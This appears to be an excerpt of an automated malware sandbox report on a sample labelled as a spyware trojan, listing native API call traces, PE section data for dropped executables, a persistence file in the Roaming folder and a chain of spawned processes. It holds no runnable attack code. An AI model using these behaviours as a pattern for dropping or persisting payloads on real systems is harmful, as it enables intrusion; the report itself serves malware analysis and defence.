                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B61F019 RtlInitUnicodeString,RtlInitUnicodeString,ZwQueryValueKey,RtlAllocateHeap,ZwQueryValueKey,RtlInitUnicodeString,ZwClose,RtlFreeHeap,
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B5898D0 ZwQueryAttributesFile,
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B58A0D0 ZwCreateTimer2,
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B5810D7 ZwOpenKey,ZwCreateKey,
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B5470C0 ZwClose,RtlFreeHeap,RtlFreeHeap,
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B5800C2 ZwAlertThreadByThreadId,
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B54B8F0 TpSetPoolStackInformation,ZwSetInformationWorkerFactory,
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B5440FD RtlImageNtHeaderEx,DbgPrintEx,memset,RtlDebugPrintTimes,DbgPrintEx,wcsstr,DbgPrintEx,DbgPrintEx,wcschr,DbgPrintEx,ZwSetInformationProcess,
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B5F60E9 ZwOpenKey,ZwClose,ZwClose,
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B56E090 RtlWow64EnableFsRedirectionEx,RtlEnterCriticalSection,RtlLeaveCriticalSection,ZwSetEvent,
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B58A890 ZwQueryDebugFilterState,
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B589890 ZwFsControlFile,
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B58108B ZwClose,
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B543880 TpSetWaitEx,RtlAllocateHeap,ZwGetCompleteWnfStateSubscription,RtlFreeHeap,TpSetWaitEx,
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B57A080 RtlDeleteCriticalSection,RtlAcquireSRWLockExclusive,RtlDeleteCriticalSection,RtlDeleteCriticalSection,ZwClose,RtlDeleteCriticalSection,
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B57F0BF ZwOpenFile,RtlFreeHeap,ZwQueryVolumeInformationFile,RtlAllocateHeap,memcpy,ZwClose,ZwClose,RtlFreeHeap,
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B58B0B0 ZwTraceControl,
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B5718B9 ZwCreateTimer2,ZwCreateWaitCompletionPacket,ZwAssociateWaitCompletionPacket,ZwClose,
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B56F0AE ZwSetInformationWorkerFactory,
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B5F60A2 ZwQueryInformationFile,
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B5D5F5F RtlInitUnicodeString,ZwOpenFile,ZwClose,RtlFreeHeap,RtlFreeHeap,RtlAllocateHeap,RtlInitUnicodeString,ZwQueryDirectoryFile,RtlAllocateHeap,memcpy,RtlFreeHeap,ZwClose,
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B589750 ZwQueryInformationThread,
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B618F6A RtlGetCurrentServiceSessionId,ZwTraceEvent,
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B580F48 ZwOpenKey,ZwClose,ZwClose,ZwCreateKey,RtlInitUnicodeStringEx,ZwSetValueKey,RtlInitUnicodeStringEx,ZwSetValueKey,ZwClose,
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B589740 ZwOpenThreadToken,
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B57174B ZwFreeVirtualMemory,RtlFlushSecureMemoryCache,ZwFreeVirtualMemory,
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B589F70 ZwCreateIoCompletion,
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B589770 ZwSetInformationFile,
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B5FCF70 RtlpGetUserOrMachineUILanguage4NLS,RtlInitUnicodeString,RtlInitUnicodeString,ZwOpenKey,RtlInitUnicodeString,ZwClose,RtlInitUnicodeString,ZwOpenKey,RtlInitUnicodeString,ZwClose,ZwClose,
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B5D176C ZwOpenEvent,ZwWaitForSingleObject,ZwClose,
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B546F60 RtlGetPersistedStateLocation,ZwOpenKey,memcpy,RtlGetPersistedStateLocation,RtlInitUnicodeString,ZwOpenKey,RtlInitUnicodeString,RtlAllocateHeap,ZwQueryValueKey,RtlExpandEnvironmentStrings,memcpy,ZwClose,ZwClose,RtlFreeHeap,
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B58AF60 ZwSetTimer2,
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B57CF6A memcpy,memcpy,RtlDosPathNameToRelativeNtPathName_U,ZwOpenFile,memcpy,RtlFreeHeap,RtlDeleteBoundaryDescriptor,DbgPrintEx,DbgPrintEx,DbgPrintEx,ZwClose,RtlFreeHeap,DbgPrintEx,memcpy,DbgPrintEx,ZwClose,
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B589710 ZwQueryInformationToken,
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B5D6715 memset,memcpy,ZwTraceEvent,
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B579702 RtlAcquireSRWLockExclusive,RtlReleaseSRWLockExclusive,ZwReleaseWorkerFactoryWorker,
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B57E730 RtlDecodePointer,ZwQueryInformationProcess,RtlRaiseStatus,RtlAllocateAndInitializeSid,RtlAllocateHeap,RtlAllocateAndInitializeSid,RtlAllocateAndInitializeSid,RtlAllocateAndInitializeSid,
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B589730 ZwQueryVirtualMemory,
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B5FCF30 ZwAlertThreadByThreadId,
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B57DFDF RtlWakeAddressAllNoFence,ZwAlertThreadByThreadId,RtlWakeAddressAllNoFence,
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B58AFD0 ZwShutdownWorkerFactory,
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B54F7C0 EtwNotificationUnregister,RtlAcquireSRWLockExclusive,RtlReleaseSRWLockExclusive,ZwClose,RtlReleaseSRWLockExclusive,RtlSetLastWin32Error,EtwNotificationUnregister,
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B5897C0 ZwTerminateProcess,
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B57D7CA RtlImageNtHeader,RtlFreeHeap,ZwCreateSection,ZwMapViewOfSection,ZwClose,RtlImageNtHeader,ZwClose,RtlFreeHeap,ZwClose,ZwClose,ZwUnmapViewOfSection,
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B550FFD RtlInitUnicodeString,ZwQueryValueKey,
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B5D0FEC ZwDuplicateObject,ZwDuplicateObject,
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B5737EB RtlImageNtHeader,RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,ZwCreateIoCompletion,ZwCreateWorkerFactory,RtlAcquireSRWLockExclusive,RtlGetCurrentServiceSessionId,ZwSetInformationWorkerFactory,
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B57FF9C RtlInitUnicodeString,ZwOpenKey,RtlInitUnicodeString,RtlInitUnicodeString,
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B5F5F87 ZwUnmapViewOfSection,
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B5D5780 DbgPrompt,ZwWow64DebuggerCall,
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B542FB0 RtlDestroyHeap,RtlDeleteCriticalSection,RtlGetCurrentServiceSessionId,RtlGetCurrentServiceSessionId,RtlGetCurrentServiceSessionId,RtlDestroyHeap,DbgPrint,DbgPrint,DbgPrint,RtlDebugPrintTimes,RtlGetCurrentServiceSessionId,RtlGetCurrentServiceSessionId,ZwTraceEvent,RtlGetCurrentServiceSessionId,ZwTraceEvent,
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B5897A0 ZwUnmapViewOfSection,
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B583FA0 RtlGetLocaleFileMappingAddress,ZwInitializeNlsFiles,RtlGetLocaleFileMappingAddress,ZwUnmapViewOfSection,
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B58B650 RtlUnhandledExceptionFilter,ZwTerminateProcess,
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B589650 ZwQueryValueKey,
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B5D6652 ZwClose,RtlAllocateHeap,memcpy,ZwUnmapViewOfSection,
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B58B640 RtlUnhandledExceptionFilter,ZwTerminateProcess,
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B58AE70 ZwSetInformationWorkerFactory,
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B589670 ZwQueryInformationProcess,
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B57BE62 ZwProtectVirtualMemory,RtlGetCurrentTransaction,RtlGetCurrentTransaction,
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B613E22 ZwTraceControl,RtlNtStatusToDosError,RtlAcquireSRWLockExclusive,RtlReleaseSRWLockExclusive,RtlSetLastWin32Error,
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B582E1C RtlInitializeCriticalSectionEx,ZwDelayExecution,
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B5D2E14 RtlGetCurrentServiceSessionId,ZwTraceEvent,
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B54C600 LdrQueryImageFileKeyOption,RtlInitUnicodeStringEx,ZwQueryValueKey,LdrQueryImageFileKeyOption,RtlFreeHeap,RtlAllocateHeap,ZwQueryValueKey,RtlFreeHeap,RtlUnicodeStringToInteger,memcpy,
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B5FFE3F memset,RtlGetCurrentServiceSessionId,ZwTraceEvent,
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B54B630 ZwWaitForKeyedEvent,
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B589E30 ZwCancelWaitCompletionPacket,
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B589E20 ZwCancelTimer2,
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B5466D4 RtlInitUnicodeString,ZwQueryValueKey,
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B579ED0 RtlReleaseSRWLockExclusive,RtlReleaseSRWLockShared,RtlAcquireSRWLockExclusive,RtlAcquireSRWLockShared,RtlReleaseSRWLockExclusive,RtlReleaseSRWLockShared,ZwWaitForAlertByThreadId,
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B5896D0 ZwCreateKey,
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B542ED8 ZwWaitForAlertByThreadId,ZwWaitForAlertByThreadId,
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B5896C0 ZwSetInformationProcess,
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B54B6F0 EtwEventWriteNoRegistration,ZwTraceEvent,RtlNtStatusToDosError,
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B5D16FA ZwQueryWnfStateNameInformation,ZwUpdateWnfStateData,EtwEventWriteNoRegistration,
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B59DEF0 RtlRaiseException,RtlCaptureContext,ZwRaiseException,RtlRaiseStatus,
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B5576FE RtlInitUnicodeString,RtlAppendUnicodeToString,RtlAppendUnicodeToString,RtlAppendUnicodeToString,ZwOpenKey,ZwClose,
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B56E6F9 ZwAlpcSetInformation,
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B618ED6 RtlGetCurrentServiceSessionId,ZwTraceEvent,
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B5896E0 ZwFreeVirtualMemory,
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B5FBE9B RtlAcquireSRWLockExclusive,ZwAllocateVirtualMemory,RtlReleaseSRWLockExclusive,
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B57DE9E RtlAcquireSRWLockExclusive,RtlAcquireSRWLockExclusive,RtlGetCurrentServiceSessionId,ZwUnsubscribeWnfStateChange,RtlReleaseSRWLockExclusive,RtlFreeHeap,RtlReleaseSRWLockExclusive,RtlReleaseSRWLockExclusive,RtlFreeHeap,
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B542E9F ZwCreateEvent,ZwClose,
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B543E80 RtlSetThreadSubProcessTag,RtlGetCurrentServiceSessionId,RtlSetThreadSubProcessTag,RtlGetCurrentServiceSessionId,ZwTraceEvent,
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B613EBC ZwTraceControl,RtlNtStatusToDosError,RtlSetLastWin32Error,
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B56E6B0 RtlSetThreadWorkOnBehalfTicket,memcmp,ZwSetInformationThread,RtlSetThreadWorkOnBehalfTicket,
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B5D2EA3 RtlGetCurrentServiceSessionId,ZwTraceEvent,
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B606D61 ZwAllocateVirtualMemoryEx,
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B5D1D43 ZwQueryInformationThread,
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B589D70 ZwAlpcQueryInformation,
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B5D1570 ZwQuerySystemInformation,RtlInitUnicodeString,memset,ZwAlpcConnectPort,ZwAlpcSendWaitReceivePort,ZwClose,
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B611D55 ZwFreeVirtualMemory,RtlWakeAddressAllNoFence,
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B5D1D6A ZwWaitForMultipleObjects,
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B618D34 RtlGetCurrentServiceSessionId,ZwTraceEvent,
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B5D1D0B ZwSetInformationProcess,
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B574D3B memset,RtlRunOnceExecuteOnce,ZwTraceControl,memcmp,RtlNtStatusToDosError,RtlFreeHeap,RtlAllocateHeap,RtlNtStatusToDosError,RtlFreeHeap,
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B571520 RtlInitializeCriticalSectionEx,RtlInitializeCriticalSectionEx,RtlGetCurrentServiceSessionId,ZwTraceEvent,
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B589520 ZwWaitForSingleObject,
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B5FFD22 ZwQueryInformationProcess,RtlUniform,
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B5445D0 RtlGetThreadWorkOnBehalfTicket,RtlGetThreadWorkOnBehalfTicket,ZwQueryInformationThread,
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B5895D0 ZwClose,
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B5FFDD3 RtlGetCurrentServiceSessionId,ZwTraceEvent,
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B56EDC4 ZwCancelWaitCompletionPacket,
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B544DC0 RtlpUnWaitCriticalSection,RtlWakeAddressAllNoFence,RtlRaiseStatus,TpWaitForAlpcCompletion,RtlpUnWaitCriticalSection,ZwSetEvent,TpWaitForAlpcCompletion,ZwAlpcQueryInformation,
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B5895C0 ZwSetEvent,
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B5495F0 TpSetPoolMinThreads,ZwSetInformationWorkerFactory,RtlGetCurrentServiceSessionId,TpSetPoolMinThreads,
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B5FBDFA RtlAcquireSRWLockExclusive,ZwAllocateVirtualMemory,RtlReleaseSRWLockExclusive,
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B5895F0 ZwQueryInformationFile,
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B589DE0 ZwAssociateWaitCompletionPacket,
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B543591 ZwSetInformationFile,
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B55DD80 RtlAcquireSRWLockShared,ZwQueryVirtualMemory,RtlImageNtHeaderEx,RtlImageNtHeaderEx,RtlImageNtHeaderEx,RtlRaiseStatus,RtlAddressInSectionTable,RtlImageDirectoryEntryToData,
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B60B581 RtlGetCurrentServiceSessionId,RtlGetCurrentServiceSessionId,RtlGetCurrentServiceSessionId,ZwTraceEvent,
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B601582 ZwTraceEvent,
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B5895B0 ZwSetInformationThread,
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B589DB0 ZwAlpcSetInformation,
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B5465A0 RtlpGetDeviceFamilyInfoEnum,RtlInitUnicodeString,ZwQueryLicenseValue,RtlInitUnicodeString,ZwOpenKey,ZwClose,RtlGetDeviceFamilyInfoEnum,RtlInitUnicodeString,ZwOpenKey,ZwClose,RtlGetVersion,
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B589DA0 ZwAlpcSendWaitReceivePort,
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B545450 RtlClearThreadWorkOnBehalfTicket,memcmp,RtlClearThreadWorkOnBehalfTicket,ZwSetInformationThread,
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B5D1C49 ZwQueryInformationProcess,
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B618C75 RtlGetCurrentServiceSessionId,ZwTraceEvent,
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B589C40 ZwAllocateVirtualMemoryEx,
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B589C70 ZwAlpcConnectPort,
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B585C70 TpSetPoolMaxThreadsSoftLimit,ZwSetInformationWorkerFactory,
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B5D1C76 ZwQueryInformationProcess,
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B57AC7B ZwFreeVirtualMemory,RtlFillMemoryUlong,RtlFlushSecureMemoryCache,ZwFreeVirtualMemory,RtlGetCurrentServiceSessionId,RtlGetCurrentServiceSessionId,DbgPrint,DbgPrint,DbgPrint,
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B56746D RtlLeaveCriticalSection,ZwClose,RtlFreeHeap,
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B5F3C60 RtlFlushSecureMemoryCache,ZwQueryVirtualMemory,
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B580413 ZwUnmapViewOfSection,
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B56FC39 ZwAssociateWaitCompletionPacket,
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B601411 ZwTraceEvent,
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B618C14 RtlGetCurrentServiceSessionId,ZwTraceEvent,
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B58A420 ZwGetNlsSectionPtr,
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B542CDB RtlFreeHeap,ZwClose,ZwSetEvent,
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B57CCC0 memcpy,RtlGetNtSystemRoot,RtlInitUnicodeString,memcpy,ZwOpenKey,ZwClose,ZwEnumerateKey,DbgPrintEx,DbgPrintEx,DbgPrintEx,
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B6014FB memset,RtlGetCurrentServiceSessionId,ZwTraceEvent,
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B5F64FB ZwOpenKey,ZwQueryValueKey,RtlEqualUnicodeString,RtlEqualUnicodeString,RtlEqualUnicodeString,ZwClose,
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B618CD6 RtlGetCurrentServiceSessionId,ZwTraceEvent,
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B54F4E3 RtlEnterCriticalSection,RtlLeaveCriticalSection,ZwSetEvent,
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B5D1CE4 ZwQueryInformationProcess,
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B614CAB ZwTraceControl,
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B5C3C93 wcschr,RtlInitUnicodeString,wcstoul,RtlAnsiStringToUnicodeString,RtlCompareUnicodeString,ZwProtectVirtualMemory,DbgPrintEx,RtlFreeUnicodeString,
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B619CB3 RtlGetCurrentServiceSessionId,ZwTraceEvent,
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B58A480 ZwInitializeNlsFiles,
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B604496 ZwAllocateVirtualMemory,DbgPrint,DbgPrint,DbgPrint,DbgPrint,DbgPrint,DbgPrint,DbgPrint,DbgPrint,DbgPrint,DbgPrint,DbgPrint,DbgPrint,DbgPrint,DbgPrint,DbgPrint,DbgPrint,DbgPrint,
                Source: F1AC.exe.10.drStatic PE information: No import functions for PE file found
                Source: C066.exe.10.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                Source: C8FE.exe.10.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                Source: DEDC.exe.10.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                Source: E64F.exe.10.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                Source: C295.exe.10.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                Source: B096.exe.10.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                Source: CAC5.exe.10.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                Source: CBF0.exe.10.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                Source: CD17.exe.10.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                Source: FD36.exe.10.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                Source: Md0q201V1D.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\gbhudtbJump to behavior
                Source: 1105.tmp.29.drBinary string: \Device\IPT
                Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winEXE@74/167@62/20
                Source: Md0q201V1D.exeJoe Sandbox Cloud Basic: Detection: clean Score: 0Perma Link
                Source: C:\Users\user\Desktop\Md0q201V1D.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                Source: unknownProcess created: C:\Users\user\Desktop\Md0q201V1D.exe 'C:\Users\user\Desktop\Md0q201V1D.exe'
                Source: C:\Users\user\Desktop\Md0q201V1D.exeProcess created: C:\Users\user\Desktop\Md0q201V1D.exe 'C:\Users\user\Desktop\Md0q201V1D.exe'
                Source: unknownProcess created: C:\Users\user\AppData\Roaming\gbhudtb C:\Users\user\AppData\Roaming\gbhudtb
                Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\21.exe C:\Users\user\AppData\Local\Temp\21.exe
                Source: C:\Users\user\AppData\Local\Temp\21.exeProcess created: C:\Users\user\AppData\Local\Temp\21.exe C:\Users\user\AppData\Local\Temp\21.exe
                Source: C:\Users\user\AppData\Roaming\gbhudtbProcess created: C:\Users\user\AppData\Roaming\gbhudtb C:\Users\user\AppData\Roaming\gbhudtb
                Source: unknownProcess created: C:\Users\user\AppData\Roaming\gbhudtb C:\Users\user\AppData\Roaming\gbhudtb
                Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\B096.exe C:\Users\user\AppData\Local\Temp\B096.exe
                Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\BBE1.exe C:\Users\user\AppData\Local\Temp\BBE1.exe
                Source: C:\Users\user\AppData\Roaming\gbhudtbProcess created: C:\Users\user\AppData\Roaming\gbhudtb C:\Users\user\AppData\Roaming\gbhudtb
                Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\CBF0.exe C:\Users\user\AppData\Local\Temp\CBF0.exe
                Source: C:\Users\user\AppData\Local\Temp\B096.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_state.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_state.exe
                Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\DF3A.exe C:\Users\user\AppData\Local\Temp\DF3A.exe
                Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\EBBE.exe C:\Users\user\AppData\Local\Temp\EBBE.exe
